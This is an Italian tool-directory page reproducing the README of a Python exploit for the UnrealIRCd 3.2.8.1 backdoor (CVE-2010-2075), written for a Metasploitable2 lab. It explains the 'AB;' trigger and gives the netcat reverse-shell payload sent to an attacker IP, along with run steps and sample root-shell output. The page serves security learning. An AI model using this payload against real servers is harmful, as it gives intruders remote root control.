Skip to content
KitploitKITPLOIT
StrumentiExploitsBlog
Log in
Invia
StrumentiExploitsBlog
Invia

Strumenti di Hacking, PenTest e Cybersecurity per il tuo Arsenale di Sicurezza!

Kitploit è una directory di strumenti di hacking, cybersecurity e pentesting. Scopri gli ultimi aggiornamenti dei progetti per trovare vulnerabilità, analizzare sistemi, automatizzare i test e rafforzare la tua sicurezza.

··Feed·Contatto·Privacy·© 2026 Kitploit

Directory degli strumenti

Categorie

Vedi tutte le categorie
Loading categories
CVE-2010-2075 — Backdoor exploit di UnrealIRCd 3.2.8.1 — reverse shell tramite AB; trigger, creato da zero in Python usando socket raw. Nessun Metasploit. | Kitploit
Strumenti/GitHubGitHub/rushikesh-a-bhujbal/cve-2010-2075
Analisi delle VulnerabilitàExploitSfruttamento di Applicazioni WebPost-ExploitPenetration TestingSicurezza della Supply ChainApprendimento e FormazioneRed TeamingSviluppo Payload
Lab e Pratica
GitHubrushikesh-a-bhujbal/cve-2010-2075

CVE-2010-2075

Backdoor exploit di UnrealIRCd 3.2.8.1 — reverse shell tramite AB; trigger, creato da zero in Python usando socket raw. Nessun Metasploit.

Vedi Repository
111h 20m faNon ancora revisionato

Più Popolari

Vedi tutti →

Scopri gli strumenti più utilizzati dalla nostra community.

Esplora tutti gli strumenti

Sfoglia la nostra collezione di strumenti

Vedi tutti gli strumenti →
Condividi

CVE-2010-2075 — Exploit Backdoor di UnrealIRCd 3.2.8.1

Python Platform Target License


Panoramica

UnrealIRCd è un server IRC (Internet Relay Chat) open-source — un protocollo che consente agli utenti di comunicare in tempo reale su una rete, simile alle prime piattaforme di chat.

Nel 2009–2010, è stato scoperto che UnrealIRCd 3.2.8.1 distribuito tramite i mirror di download ufficiali era stato compromesso. Un attaccante aveva sostituito il codice sorgente legittimo con una versione backdoorata contenente un trigger nascosto per l'esecuzione di comandi.

Questo è stato un attacco supply chain — identico per natura a CVE-2011-2523 (vsftpd 2.3.4). Il software legittimo è stato sostituito con una versione modificata malevolmente prima che gli utenti lo scaricassero.


Come Funziona la Backdoor

La backdoor monitora tutti i dati in ingresso sulla porta 6667. Se un input inizia con la stringa AB;, tutto ciò che segue viene passato — bypassando completamente tutta la logica IRC, l'autenticazione e i controlli di registrazione.

direttamente a system()

Il trigger si attiva durante la fase di inizializzazione della connessione, prima che il server IRC registri persino il client. Nessun NICK, nessun USER, nessuna autenticazione richiesta.

Flusso dell'attacco:

root@kitploit:~
Attacker (Kali)                    Target (Metasploitable2)
                                   
1. s1 connects to port 6667   
   NICK + USER handshake      →    Server sends full banner
   Read banner, check version  
   Confirm Unreal3.2.8.1      
                                   
2. Open listener on port 4444  
   (waiting for incoming shell)
                                   
3. s2 connects to port 6667   →    AB; nc -e /bin/bash KALI_IP 4444
                               →    system() executes immediately
                               →    netcat spawns bash, connects back
                                   
4. listener.accept()          ←    Incoming root shell connection
   Interactive root shell      

Reverse Shell vs Bind Shell

Questo exploit utilizza una reverse shell — il target si connette all'attaccante, anziché l'attaccante connettersi a una porta sul target.

TipoDirezioneUtilizzato In
Bind shellAttaccante → TargetCVE-2011-2523 (vsftpd)
Reverse shellTarget → AttaccanteCVE-2010-2075 (UnrealIRCd)

Le reverse shell bypassano le regole del firewall in entrata — le connessioni in uscita dal target sono raramente bloccate.


Requisiti

  • Python 3.x
  • Nessuna libreria esterna — solo libreria standard
  • netcat installato sul target (presente di default su Metasploitable2)
  • Target: Metasploitable2 con UnrealIRCd 3.2.8.1 in esecuzione

Utilizzo

root@kitploit:~
git clone https://github.com/rushikesh-a-bhujbal/CVE-2010-2075.git
cd exploit-dev/CVE-2010-2075

Modifica main.py e imposta:

root@kitploit:~
kali_ip = "YOUR_KALI_IP"
target_ip = "TARGET_IP"

Esegui:

root@kitploit:~
python3 main.py

Output di esempio:

root@kitploit:~
[+] Vulnerable version confirmed. Proceeding...
[*] Listening on port 4444...
[+] Shell received from ('192.168.15.132', 58280)
> whoami
root
> uname -a
Linux metasploitable 2.6.24-16-server #1 SMP Thu Apr 10 13:58:00 UTC 2008
> pwd
/etc/unreal
> exit

Gestione degli Errori

ScenarioComportamento
Porta 6667 chiusaStampa "Port Closed", esce in modo pulito
Versione errataStampa "Not vulnerable", esce in modo pulito
Il target non richiamalistener.accept() attende (aggiungi un timeout se necessario)
Il comando non produce outputrecv() va in timeout silenziosamente, ritorna al prompt

Differenza Chiave da CVE-2011-2523

CVE-2011-2523 (vsftpd)CVE-2010-2075 (UnrealIRCd)
ProtocolloFTP (porta 21)IRC (porta 6667)
Trigger:) nel nome utentePrefisso AB; su qualsiasi input
Tipo di shellBind shell (porta 6200)Reverse shell (porta dell'attaccante)
Connessioni2 in uscita1 in uscita + 1 in entrata

Testato Contro

  • Metasploitable2 (VM intenzionalmente vulnerabile)
  • UnrealIRCd 3.2.8.1
  • Linux metasploitable 2.6.24-16-server

Disclaimer Legale

Questo exploit è sviluppato strettamente per scopi educativi e per ricerca di sicurezza autorizzata.

Creato e testato esclusivamente contro una macchina virtuale Metasploitable2 locale in un ambiente di laboratorio completamente isolato.

Non utilizzare questo strumento contro qualsiasi sistema di cui non sei proprietario o per cui non hai esplicita autorizzazione scritta per il test. L'uso non autorizzato è illegale ai sensi del Computer Fraud and Abuse Act (CFAA) e leggi equivalenti in tutto il mondo.

L'autore non si assume alcuna responsabilità per l'uso improprio di questo codice.


Riferimenti

  • CVE Record: https://www.cve.org/CVERecord?id=CVE-2010-2075
  • NVD Entry: https://nvd.nist.gov/vuln/detail/CVE-2010-2075
  • Divulgazione Originale: https://www.exploit-db.com/exploits/13853
  • Metasploitable2: https://sourceforge.net/projects/metasploitable/

Autore

Rushikesh Bhujbal
Security Research & Exploit Development
GitHub

Scarica lo strumento